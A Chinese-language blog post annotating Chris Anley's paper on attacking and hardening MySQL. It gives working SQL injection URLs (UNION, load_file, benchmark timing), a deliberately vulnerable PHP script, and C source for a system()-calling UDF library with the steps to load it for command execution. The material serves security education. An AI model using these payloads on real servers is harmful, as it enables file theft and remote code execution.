Hackproofing mysql

这是一篇很经典的论文,作者Chris Anley 是shellcode handbook的作者之一。我在写这篇文章的时候也参考了官方文档,这篇文章虽然已经满大街了,但是仔细读过还是学到了很多知识,有些地方限于技术和英文水平不能很好的理解,多有疏漏,请看官见谅。

0x01 mysql介绍

mysql号称是世界上最流行的开源数据库,它免费,而且跨平台,配置简单,而且在高负载工作时也能有很好的性能。相比其他的数据库,它的配置过于简单,由此大大挑战了mysql的安全性。本文介绍了mysql的常规攻击方法,使用者们可以防备这些攻击。(由于本文是2004年的文章,mysql已经更新到5.7版本,省略了版本介绍部分)

0x02 网络中的mysql

因为mysql 的免费,容易获得,很多个人电脑上都安装了mysql,不一定是专门的服务器。典型的配置里客户端通过TCP3306端口连接mysql,windows中则是通过命名管道(不推荐这种方式)。mysql默认两种都有。mysql使用的网络协议相对于其他的DBMS要简单,默认明文传输,4.0.0以上版本支持ssl。很容易检测出来一个主机使用的mysql版本,甚至也会返回操作系统的信息。端口扫描能泄漏很多主机的信息,管理员除了改源码也没有什么好办法。

这样检测一下mysql是不是传输的加密数据(PS:如果是加密的也不意味着安全)
shell>tcpdump -l -i eth0 -w - src or dst port 3306 | strings

mysql大多数作为网页应用的后端,和Apache/PHP 网页应用一起作为web服务器。也有的作为日志服务器,IDS入侵探测记录或者其他的审计工作。在内部网络中的应用更加传统,桌面开发环境中总有mysql。

鉴于历史上mysql是明文通信,通常用SSH加在密信道中端口转发连接3306端口。好处就是信息传输中被加密了,强行加了一道验证。
要了解更多的安全配置还是看官方的推荐
http://dev.mysql.com/doc/refman/5.7/en/security.html
但是指南中通常建议将web服务器和mysql放在同一主机上,这样就可以禁止mysql的远程访问,但同时如果web服务器被攻击所有的数据库信息都会被窃取.SQL注入等漏洞也会导致攻击者修改数据库内容。虽然正确的权限管理会缓解一下情况,但是也应该时刻记住数据库和web服务器在同一个主机上给攻击者提供了很多便利。
(因为都不是最新的漏洞了所以以下省略各种漏洞编号和简介)

0x03mysql中的SQL注入

即使安全社区多年不断的劝告和说教,SQL注入如今依然是个大问题,根本的原因是对用户输入没有充分过滤。
php中'magic_quotes_rpc'选项控制PHP引擎是否自动转义单引号,双引号,反斜杠,NULL。

$query = "SELECT * FROM user where user = '" . $_REQUEST['user'] . "'"; $query = "SELECT * FROM user order by " . $_REQUEST['user']; $query = "SELECT * FROM user where max_connections = " .$_REQUEST['user'];
类似这样的语句,都存在SQL注入。
如果没开启'magic_quotes_rpc' 安全性就会更差一点。

接下来的问题是:黑客SQL注入攻击之后能干什么。
一些危险操作列表

  • UNION SELECT
  • LOAD_FILE function
  • LOAD DATA INFILE statement
  • SELECT ... INTO OUTFILE statement
  • BENCHMARK function
  • User Defined Functions (UDFs)

有个具体的实例可以更加形象的理解,以下有一段PHP代码(明显是虚构的只作为展示)

<?php
/* Connecting, selecting database */
$link = mysql_connect("my_host", "root")
or die("Could not connect : " . mysql_error());
print "Connected successfully";
mysql_select_db("mysql") or die("Could not select database");
/* Performing SQL query */
$query = "SELECT * FROM user where max_connections = " . $_REQUEST
['user'];
print "<h3>Query: " . $query . "</h3>";
$result = mysql_query($query) or die("Query failed : " .
mysql_error());
/* Printing results in HTML */
print "<table>\n";
while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {
print "\t<tr>\n";
foreach ($line as $col_value) {
print "\t\t<td>$col_value</td>\n";
}
print "\t</tr>\n";
}
print "</table>\n";
/* Free resultset */
mysql_free_result($result);
?>
/* Closing connection */
联合查询UNION

如今联合查询UNION已经成为了SQL注入攻击的重要分支。
上面有一段代码像这样
$query = "SELECT * FROM user where max_connections = " . $_REQUEST['user'];
max_connection=0 表示root用户,如果我们请求这样的链接
http://mysql.example.com/query.php?user=0
得到user表的输出。

如果我们想获得除user外其他有用的数据,UNION指令可以结合两次的查询结果,可以查询不同的表。既然UNION可以在WHERE子句之后,我们就可以选择任何的数据,有一些点需要注意。

  • 我们选择的指令返回的字段长度要和前一句一样(长度31如果你数了的话)
    +前后数据类型要匹配
    +如果我们的数据中包括文本,语句会被截断和第一句里一样长。

如果我们想查询‘@@version’
请求像这样
http://mysql.examples.com/query.php?user=1+union+select+@@version,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1

0x04 LOAD_FILE 函数

LOAD_FILE函数用字符串形式返回了文件内容,例如在Windows下
select load_file('c:/boot.ini');
如果目标用PHP而且打开了魔术引号功能,那我们就不能用单引号了
(原文说能够hex编码能够绕过,亲测不好用)
因为这样只能显示前60个字符,用substring()解决问题
http://mysql.example.com/query.php?user=1+union+select+substring(load_file (0x633a2f626f6f742e696e69),60), 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1

LOAD DATA IN FILE

如果SQL注入的环境允许攻击者注入复合语句,这就变成了一个严重的问题。
通常这样利用

load data infile 'c:/boot.ini' into table foo;
select * from foo;```

load data 一个危险的特性可能导致攻击者从客户端拿走文件(而不是服务端),这意味着从web服务器上就能读取文件,不用数据库服务器。
这个问题已经在后面的版本中‘解决’了,需要检查配置客户端和服务端都需要同意才能启用这个功能,所以还要检查配置。
***
PS:为了解决这个问题,LOAD DATA LOCAL 这样工作
+ 默认所有的mysql客户端和二进制文件编译的时候都用-DENABLED_LOCAL_INFILE=1 
+ 即使自己从源码编译的时候没有加上-DENABLED_LOCAL_INFILE=1 这一项,LOAD DATA LOCAL也不能被客户端调用,除非明确指出mysql_options(... MYSQL_OPT_LOCAL_INFILE , 0)
+ 服务端可以禁用所有的LOAD DATA LOCAL 命令 ,用--local-infile=0打开mysqld 
+ 对于命令行mysql客户端,--local-infile[=1]选项打开功能,--local-infile=0禁止。对于mysqlimport,默认是禁止的。可以用--local  -L 打开。
无论怎样,想加载本地文件都需要服务端的同意。
+如果你在Perl脚本中用了LOAD DATA LOCAL 或者其他程序在选项文件中读取了用户组,可以将这个组添加 local-infile 选项。或者为了避免麻烦,用loose-前缀
`[client]
loose-local-infile=1`
+ 如果LOAD DATA LOCAL被客户端或服务端禁止,客户端的错误消息
`ERROR 1148 : The used command is not alleowed with this MySQL version`
***
####0x05 SELECT .. INTO OUTFILE
这条语句为黑客指了一条控制mysql服务器的大道——创建一个不存在的配置文件。最近的版本中虽然不能修改存在的文件,但是可以创建一个新的。
最好的例子是CAN-2003-0150,在3.23.55或更早的版本中可以覆盖my.cnf文件,配置MySQL以root用户重启。3.23.56修补了这个漏洞,但是通过确认’user‘设置 /etc/my.cnf 来覆盖 /datadir/my.cnf

如果你想用SELECT..INTO OUTFILE创建一个二进制文件,特定的字母会被反斜杠转义,NULL用’\0‘替代。
**SELECT ... INTO DUMPFILE**
这条指令可以利用创建动态加载库,再包含一个恶意的UDF(自定义函数),然后用“CREATE FUNCTION”载入库,将函数链接到MySQL。
这么说来,就是一个任意代码执行了。保证攻击的关键在于当MySQL加载动态库的时候攻击者要让它像要寻找的位置写入一个文件。它依赖于文件的权限和文件在系统的位置。

####0x06 时间延时和基准函数
很多时候,web应用不返回任何的错误信息,他们都被有经验的开发者过滤了,给确认SQL注入漏洞带来了一些困难。
这种情况下攻击者注入一个SQL延时语句,看请求的延时就更容易判断web应用的脆弱点。用条件语句和时间延时相结合能从数据中提取更多信息。

MySQL中没有sleep和wait这种函数,可以用加密函数和benchmark替代。
+ ```select benchmark( 500000, sha1( 'test' ) );```
计算sha1('test')500000次。在一个单核1.7GHz的机器上大约消耗五秒。
请求URL
`http://mysql.example.com/query.php?user=1+union+select+benchmark(500000,sha1
(0x414141)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1`
会让应用回应延迟10-15秒

+ 攻击者用这种方式来一步步探测信息,比如
select if( user() like 'root@%', benchmark(100000,sha1('test')), 'false' );
可以知道用户名是不是root
+ 下一步就是每次1bit的获取信息
select if( (ascii(substring(user(),1,1)) >> 7) & 1, benchmark(100000,sha1('test')), 'false' );
如果user()的第一bit是1 就延迟
***复合语句可以同时执行,所以这种方式不慢,也很可靠***

#####0x07 User define functions
MySQL提供了一个机制,默认函数可以自己扩展,通过定制动态加载库来使用UDF。
'CREATE FUNCTION'命令和手动添加'mysql.func'中的条目都可以。
库中的函数一定要在MySQL正常可获取的路径中。
攻击者利用这种机制创建动态库,SELECT ... INTO DUMPFILE 将其写到合适的目录中,接着需要mysql.func的  'update','insert'的权限让MySQL加载库并执行函数。

***一个简单UDF库的例子***
```cpp
#include <stdio.h>
#include <stdlib.h>
/*
compile with something like
gcc -g -c so_system.c
then
gcc -g -shared -W1,-soname,so_system.so.0 -o so_system.so.0.0 so_system.o -lc
*/
enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT};
typedef struct st_udf_args
{
unsigned int arg_count;    /* Number of arguments */
enum Item_result *arg_type;/* Pointer to item_results */
char **args;                       /* Pointer to argument */
unsigned long *lengths;    /* Length of string arguments */
char *maybe_null;             /* Set to 1 for all maybe_null args */
} UDF_ARGS;
typedef struct st_udf_init
{
char maybe_null;                /* 1 if function can return NULL */
unsigned int decimals;               /* for real functions */
unsigned long max_length; /* For string functions */
char *ptr;             /* free pointer for function data */
char const_item; /* 0 if result is independent of arguments */
} UDF_INIT;
int do_system( UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error)
{
if( args->arg_count != 1 )
return 0;
system( args->args[0] );
return 0;
}

将函数添加到MySQL
mysql> create function do_system returns integer soname 'so_system.so'; Query OK, 0 rows affected (0.00 sec) mysql> select * from mysql.func; mysql> select do_system('ls > /tmp/test.txt');//这样调用

即使攻击者没有权限在目标系统中创建库,利用一些已有的库也可以达到恶意目的。
攻击的难点在于大多数的函数参数不容易匹配MySQL的UDF原型。
int xxx( UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error)
尽管更富有经验的黑客会用已有的库构造任意代码执行,但是所有的错误基本可控,利用的价值不大。

但是还是可以用系统库做一些坏事,调用Windows的结束进程作为MySQL的UDF会立即结束MySQL,即使调用的用户没有'Shutdown_priv'

mysql> create function ExitProcess returns integer soname 'kernel32'; Query OK, 0 rows affected (0.17 sec) mysql> select exitprocess(); ERROR 2013: Lost connection to MySQL server during query
还可以锁住用户的工作站
mysql> create function LockWorkStation returns integer soname 'user32'; Query OK, 0 rows affected (0.00 sec) mysql> select LockWorkStation();

MySQL的UDF机制对开发者和黑客都同样灵活多变,富有价值。
小心的控制好MySQL的权限,尤其是mysql.func 表,文件权限,限制使用'SELECT .. INTO FILE'。

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 195,360评论 5 461
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 82,195评论 2 373
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 142,543评论 0 323
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 52,420评论 1 266
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 61,242评论 4 357
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 46,224评论 1 273
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 36,626评论 3 384
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 35,301评论 0 253
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 39,589评论 1 292
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 34,660评论 2 312
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 36,423评论 1 326
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 32,286评论 3 313
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 37,662评论 3 299
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 28,951评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 30,237评论 1 250
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 41,613评论 2 342
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 40,804评论 2 335

推荐阅读更多精彩内容